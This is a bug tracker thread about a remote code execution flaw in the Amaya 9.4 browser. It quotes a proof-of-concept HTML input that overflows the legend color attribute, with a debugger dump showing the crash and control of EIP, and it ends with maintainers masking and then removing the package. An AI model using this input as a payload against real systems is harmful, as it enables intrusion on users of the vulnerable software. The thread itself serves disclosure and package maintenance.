Amaya <= 9.4 susceptible to remote code execution. Since Amaya is unmaintained, I suggest that it be masked.

"""snip"""

The following code snippet forces Amaya 9.4 to crash:

> <legend color="Ax200">
> eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
> edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
>
> 00516114 56 push esi
> 00516115 57 push edi
> 00516116 33ff xor edi,edi
> 00516118 33f6 xor esi,esi
> 0051611a 3bcf cmp ecx,edi
> 0051611c 893d943df101 mov [amaya+0x1b13d94 (01f13d94)],edi
> 00516122 7511 jnz amaya+0x116135 (00516135)
> 00516124 6a0a push 0xa
> 00516126 e825d80500 call amaya+0x173950 (00573950)
> 0051612b 83c404 add esp,0x4
> 0051612e 8bd7 mov edx,edi
> 00516130 8bc6 mov eax,esi
> 00516132 5f pop edi
> 00516133 5e pop esi
> 00516134 c3 ret
> FAULT ->00516135 8b4134 mov eax,[ecx+0x34]
> ds:0023:41414175=????????
> 00516138 3bc7 cmp eax,edi
> 0051613a 74f2 jz amaya+0x11612e (0051612e)
> 0051613c 8b4938 mov ecx,[ecx+0x38]
> 0051613f 5f pop edi
> 00516140 8bd1 mov edx,ecx
> 00516142 5e pop esi
> 00516143 c3 ret
>
> Nopslide.. We are able to control the EIP:
>
> <legend color=
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAABBBB>
> eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
> edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
>
> Funktion: <nosymbols>
> No prior disassembly possible
> 42424242 ?? ???
> 42424244 ?? ???
> 42424246 ?? ???
> 42424248 ?? ???
> 4242424a ?? ???
> 4242424c ?? ???

Online-demo: http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html

"""snip"""
We should post a call to -dev to find some maintainer here.
Call for maintainer posted
*** Bug 130900 has been marked as a duplicate of this bug. ***
We have an ebuild but nobody wants to maintain this. I vote for masking...
I'm for masking as well.
masked it, keeping the bug open as enhancement until we have a fix or remove the package.
(In reply to comment #6)
> masked it, keeping the bug open as enhancement until we have a fix or remove
> the package.

treecleaners would like to remove the package.
www-client/amaya is removed!